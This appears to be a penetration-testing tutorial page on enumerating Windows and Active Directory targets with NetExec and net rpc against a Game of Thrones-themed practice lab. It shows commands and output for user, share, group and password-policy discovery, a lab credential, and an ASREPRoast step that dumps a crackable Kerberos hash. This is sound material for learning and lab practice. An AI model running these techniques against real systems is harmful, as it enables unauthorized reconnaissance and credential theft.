Windows Enumeration¶
Enumeration is a critical phase in penetration testing where detailed information about the target system is gathered. On Windows systems, this involves identifying users, groups, services, shares, and configurations that can be exploited. Here are some common techniques and tools used for enumeration on Windows systems:
NetExec: User Enumeration
Identify user accounts on the target Windows system. This can be done using tools like nxc to query SMB services for user information.
Without Credentials¶
nxc smb 10.10.10.11 --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.11 445 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
SMB 10.10.10.11 445 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
SMB 10.10.10.11 445 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
SMB 10.10.10.11 445 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
SMB 10.10.10.11 445 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
SMB 10.10.10.11 445 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
SMB 10.10.10.11 445 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
SMB 10.10.10.11 445 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
SMB 10.10.10.11 445 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated 10 local users: NORTH
With Credentials¶
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.11 445 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
SMB 10.10.10.11 445 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
SMB 10.10.10.11 445 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
SMB 10.10.10.11 445 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
SMB 10.10.10.11 445 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
SMB 10.10.10.11 445 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
SMB 10.10.10.11 445 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
SMB 10.10.10.11 445 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
SMB 10.10.10.11 445 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated 10 local users: NORTH
NetExec: Shares Enumeration
Identify shared resources on the target Windows system. This can be done using tools like nxc to query SMB services for share information.
Without Credentials (Anonymous Access)¶
nxc smb 10.10.10.23 -u 'a' -p '' --shares
SMB 10.10.10.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.10.10.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 10.10.10.23 445 BRAAVOS [*] Enumerated shares
SMB 10.10.10.23 445 BRAAVOS Share Permissions Remark
SMB 10.10.10.23 445 BRAAVOS ----- ----------- ------
SMB 10.10.10.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.10.10.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.10.10.23 445 BRAAVOS C$ Default share
SMB 10.10.10.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.10.10.23 445 BRAAVOS IPC$ Remote IPC
SMB 10.10.10.23 445 BRAAVOS public Basic Read share for all domain users
With Credentials¶
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
NetExec: LDAP Enumeration
Enumerate LDAP information on the target Windows system. This can be done using tools like nxc to query LDAP services for directory information.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Enumerated 16 domain users: north.sevenkingdoms.local
LDAP 10.10.10.11 389 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.10.11 389 WINTERFELL Administrator 2025-10-18 18:41:56 0 Built-in account for administering the computer/domain
LDAP 10.10.10.11 389 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.10.11 389 WINTERFELL vagrant 2021-05-12 11:39:16 0 Vagrant User
LDAP 10.10.10.11 389 WINTERFELL krbtgt 2025-10-18 19:07:40 0 Key Distribution Center Service Account
LDAP 10.10.10.11 389 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
LDAP 10.10.10.11 389 WINTERFELL eddard.stark 2025-10-31 23:47:22 0 Eddard Stark
LDAP 10.10.10.11 389 WINTERFELL catelyn.stark 2025-10-31 23:47:24 0 Catelyn Stark
LDAP 10.10.10.11 389 WINTERFELL robb.stark 2025-10-31 23:47:26 0 Robb Stark
LDAP 10.10.10.11 389 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
LDAP 10.10.10.11 389 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
LDAP 10.10.10.11 389 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
LDAP 10.10.10.11 389 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
LDAP 10.10.10.11 389 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
LDAP 10.10.10.11 389 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
LDAP 10.10.10.11 389 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
LDAP 10.10.10.11 389 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
Group Enumeration¶
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --groups
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL Administrators
LDAP 10.10.10.11 389 WINTERFELL Users
LDAP 10.10.10.11 389 WINTERFELL Guests
LDAP 10.10.10.11 389 WINTERFELL Print Operators
LDAP 10.10.10.11 389 WINTERFELL Backup Operators
LDAP 10.10.10.11 389 WINTERFELL Replicator
LDAP 10.10.10.11 389 WINTERFELL Remote Desktop Users
LDAP 10.10.10.11 389 WINTERFELL Network Configuration Operators
LDAP 10.10.10.11 389 WINTERFELL Performance Monitor Users
LDAP 10.10.10.11 389 WINTERFELL Performance Log Users
LDAP 10.10.10.11 389 WINTERFELL Distributed COM Users
LDAP 10.10.10.11 389 WINTERFELL IIS_IUSRS
LDAP 10.10.10.11 389 WINTERFELL Cryptographic Operators
LDAP 10.10.10.11 389 WINTERFELL Event Log Readers
LDAP 10.10.10.11 389 WINTERFELL Certificate Service DCOM Access
LDAP 10.10.10.11 389 WINTERFELL RDS Remote Access Servers
<< SNIP FOR BREVITY >>
NetExec: Kerberos Enumeration
The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --asreproast output.txt
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Total of records returned 2
LDAP 10.10.10.11 389 WINTERFELL $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:dc53ebd052dc6bea6d6da0e206c3f7eb$a8033ec5c02ae49877f85e0f1af50206cb2cae5e26a9c7bbcb4da74ec6417dc5104d57e23b148530b44efa3c73
f83d7426174ea0913b5f6b62c48aa4bf2df3315610b42729e65bb8db74eb09ecf2d842a22ced964ce7c3489b2bdcd6c196de8069aea600b541bf40e1f0ae6a201
5be254ec5d954bd7bfc7bba839538acdd27b743b2bae9a7a6a55db96c0e3647734b633ba74e6fd7731690646283a36e43ac79554203e829d55aee938e35905800
03027b3329e38683fa29625e7eb1a55f96d287ecbc361ac30b6b61806d38814e304c7966bf65902c4ff732ee11df063d45305d80bb5b2d1384fe340d69f596484
ba4e5ea440e7e2c3c644c5c09128e18dab53d18290c185a
Crack the hash using Hashcat¶
NetExec: Enum Password Policy
Discovering Password complexity settings is very important as to not lock out users when attempting to bruteforce their passwords during an active pentest.
Without Creds (Rare)¶
nxc smb 10.10.10.11 --pass-pol
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 10.10.10.11 445 WINTERFELL Minimum password length: 5
SMB 10.10.10.11 445 WINTERFELL Password history length: 24
SMB 10.10.10.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 10.10.10.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Complex: 0
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 10.10.10.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 10.10.10.11 445 WINTERFELL Forced Log off Time: Not Set
With Credentials¶
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --pass-pol
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 10.10.10.11 445 WINTERFELL Minimum password length: 5
SMB 10.10.10.11 445 WINTERFELL Password history length: 24
SMB 10.10.10.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 10.10.10.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Complex: 0
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 10.10.10.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 10.10.10.11 445 WINTERFELL Forced Log off Time: Not Set
RPC: Users Enumeration
Use RPC to enumerate users on the target Windows system. This can be done using tools like net rpc.
net rpc group members 'Domain Users' -W 'NORTH' -I '10.10.10.11' -U '%'
NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc